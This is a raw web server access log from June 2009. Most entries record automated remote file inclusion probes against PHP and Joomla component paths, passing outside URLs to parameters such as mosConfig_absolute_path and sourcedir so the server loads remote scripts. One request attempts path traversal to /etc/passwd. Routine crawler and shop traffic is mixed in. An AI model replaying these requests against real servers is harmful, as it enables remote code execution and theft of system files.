218.185.20.88 - - [04/Jun/2009:02:17:46 -0400] "GET /logs/access_log.Q108121900%20%20/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:17:46 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.223.3.98 - - [04/Jun/2009:02:17:46 -0400] "GET /logs/access_log.Q109052500//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:17:46 -0400] "GET /?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [04/Jun/2009:02:17:46 -0400] "GET /logs/?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 200 4098 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.223.3.98 - - [04/Jun/2009:02:17:49 -0400] "GET /logs/access_log.Q109052500//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:17:50 -0400] "GET /logs/access_log.Q109051000//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:02:17:56 -0400] "GET /logs/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:02:17:56 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:02:17:56 -0400] "GET /?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:02:17:57 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:17:57 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:17:57 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
38.99.13.118 - - [04/Jun/2009:02:18:01 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
110.45.145.50 - - [04/Jun/2009:02:18:02 -0400] "GET /logs/access_log.Q109053100//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
62.149.15.68 - - [04/Jun/2009:02:18:04 -0400] "GET //?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:02:18:04 -0400] "GET /logs/access_log.Q109051600//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:02:18:04 -0400] "GET /logs//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:02:18:15 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
220.79.47.122 - - [04/Jun/2009:02:18:15 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
220.79.47.122 - - [04/Jun/2009:02:18:15 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
216.17.99.13 - - [04/Jun/2009:02:18:18 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:18:25 -0400] "GET /logs/access_log.Q108121900%20%20/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:18:31 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.145.50 - - [04/Jun/2009:02:18:43 -0400] "GET /logs/access_log.Q109051600/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:18:43 -0400] "GET /logs/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:18:43 -0400] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
110.45.145.50 - - [04/Jun/2009:02:18:48 -0400] "GET /logs/access_log.Q109053100/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
38.99.44.103 - - [04/Jun/2009:02:18:50 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.122.160.145 - - [04/Jun/2009:02:19:10 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.160.145 - - [04/Jun/2009:02:19:10 -0400] "GET /phphtml.php?htmlclass_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.160.145 - - [04/Jun/2009:02:19:10 -0400] "GET /logs/phphtml.php?htmlclass_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:19:22 -0400] "GET /logs/access_log.Q108121900/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.160.145 - - [04/Jun/2009:02:19:32 -0400] "GET /phphtml.php?htmlclass_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.160.145 - - [04/Jun/2009:02:19:32 -0400] "GET /logs/phphtml.php?htmlclass_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.122.160.145 - - [04/Jun/2009:02:19:32 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:02:20:44 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.59.12.99 - - [04/Jun/2009:02:21:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.79.96.10 - - [04/Jun/2009:02:21:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B14004E2370095FE00R+M37+ENG HTTP/1.1" 200 40933 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057AC4604129700C6EE00P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
203.151.233.106 - - [04/Jun/2009:02:21:31 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:02:21:32 -0400] "GET /logs/access_log.Q109053100//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:02:21:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B34B0832A700397E00S+M37+ENG HTTP/1.1" 200 40508 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B14004E2370095FE00R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
220.79.47.122 - - [04/Jun/2009:02:21:53 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
219.79.96.10 - - [04/Jun/2009:02:21:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B34B0832A700397E00S+M37+ENG HTTP/1.1" 200 40508 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B14004E2370095FE00R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.85.63.226 - - [04/Jun/2009:02:22:05 -0400] "GET /http://www.mykr.net/bbs/data/vop.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
203.151.233.106 - - [04/Jun/2009:02:23:00 -0400] "GET /logs/access_log.Q109052900//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:23:39 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:23:39 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:23:39 -0400] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:23:39 -0400] "GET //components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.6.8.112 - - [04/Jun/2009:02:23:42 -0400] "GET /images/_notes/ace_bkgrd_white_r2_c1.gif.mno HTTP/1.0" 200 254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.162.28 - - [04/Jun/2009:02:23:53 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:02:24:03 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.17.99.13 - - [04/Jun/2009:02:24:25 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:24:47 -0400] "GET /logs/access_log.Q109050700%20%20//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.116.219.91 - - [04/Jun/2009:02:25:03 -0400] "GET /logs/access_log.Q108121900 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.159.30.165 - - [04/Jun/2009:02:25:10 -0400] "GET /logs/access_log.Q108121900 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.165.73.157 - - [04/Jun/2009:02:25:34 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
206.225.92.50 - - [04/Jun/2009:02:25:44 -0400] "GET /logs///components/com_simpleboard/image_upload.php?sbp=../../../../../../../../etc/passwd HTTP/1.0" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:02:25:45 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
220.79.47.122 - - [04/Jun/2009:02:26:06 -0400] "GET /logs/access_log.Q109052100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
123.143.98.5 - - [04/Jun/2009:02:26:07 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:26:07 -0400] "GET //?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:26:07 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:26:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [04/Jun/2009:02:26:11 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:26:11 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:26:11 -0400] "GET //?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:26:50 -0400] "GET /config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:26:50 -0400] "GET /logs/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:26:51 -0400] "GET /logs/access_log.Q109010700/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:26:52 -0400] "GET /logs/access_log.Q109010700/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:26:52 -0400] "GET /logs/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:26:54 -0400] "GET /config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:27:10 -0400] "GET /logs/error_log.Q109010200/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:27:12 -0400] "GET /logs/error_log.Q109010200/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.6.8.112 - - [04/Jun/2009:02:27:19 -0400] "GET /logs/error_log.Q107111000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [04/Jun/2009:02:27:41 -0400] "GET /logs/access_log.Q109010700%20%20/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:27:42 -0400] "GET /logs/access_log.Q109010700%20%20/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:27:42 -0400] "GET /logs/access_log.Q108121900%20%20//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:27:49 -0400] "GET /logs/access_log.Q108121900%20%20//?path%5Bdocroot%5D=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:27:52 -0400] "GET /logs/error_log.Q109010200%20%20/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:27:54 -0400] "GET /logs/error_log.Q109010200%20%20/config.inc.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
219.85.63.226 - - [04/Jun/2009:02:28:01 -0400] "GET /logs/error_log.Q109051800/http://www.mykr.net/bbs/data/vop.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:28:24 -0400] "GET /logs/access_log.Q109051100/?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:28:24 -0400] "GET /?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:28:24 -0400] "GET /logs/?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 4098 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:28:28 -0400] "GET /?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:28:28 -0400] "GET /logs/?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 4098 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:28:29 -0400] "GET /logs/access_log.Q109051100/?_zb_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
219.79.96.10 - - [04/Jun/2009:02:29:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B34B0832A700397E00S+M37+ENG HTTP/1.1" 200 40934 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B14004E2370095FE00R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:02:29:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B34B0832A700397E00S+M37+ENG HTTP/1.1" 200 40934 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B14004E2370095FE00R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:02:29:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B54D0D5267000E6E00T+M37+ENG HTTP/1.1" 200 40067 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B34B0832A700397E00S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
66.249.67.54 - - [04/Jun/2009:02:30:00 -0400] "GET /images/index5_probes.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
70.38.54.140 - - [04/Jun/2009:02:30:08 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:30:08 -0400] "GET /phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:30:10 -0400] "GET /?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:30:11 -0400] "GET /logs/?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:30:12 -0400] "GET /?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:30:12 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:30:13 -0400] "GET /logs/?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:30:16 -0400] "GET /logs/access_log.Q109052400/?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:02:30:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B54D0D5267000E6E00T+M37+ENG HTTP/1.1" 200 40934 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B34B0832A700397E00S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
89.223.3.98 - - [04/Jun/2009:02:30:20 -0400] "GET /logs/access_log.Q109052400/?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.79.96.10 - - [04/Jun/2009:02:30:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B5460DB277003AAE00T+M37+ENG HTTP/1.1" 200 39580 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B54D0D5267000E6E00T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
219.79.96.10 - - [04/Jun/2009:02:31:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B5460DB277003AAE00T+M37+ENG HTTP/1.1" 200 40512 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B54D0D5267000E6E00T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
209.59.12.99 - - [04/Jun/2009:02:31:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.79.96.10 - - [04/Jun/2009:02:31:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1057B5460E524700648E00T+M37+ENG HTTP/1.1" 200 39580 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1057B5460DB277003AAE00T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
89.223.3.98 - - [04/Jun/2009:02:31:56 -0400] "GET /logs/access_log.Q109052900/?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:02:32:06 -0400] "GET /logs/access_log.Q109052900/?_zb_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:32:12 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:32:31 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:33:03 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:33:03 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
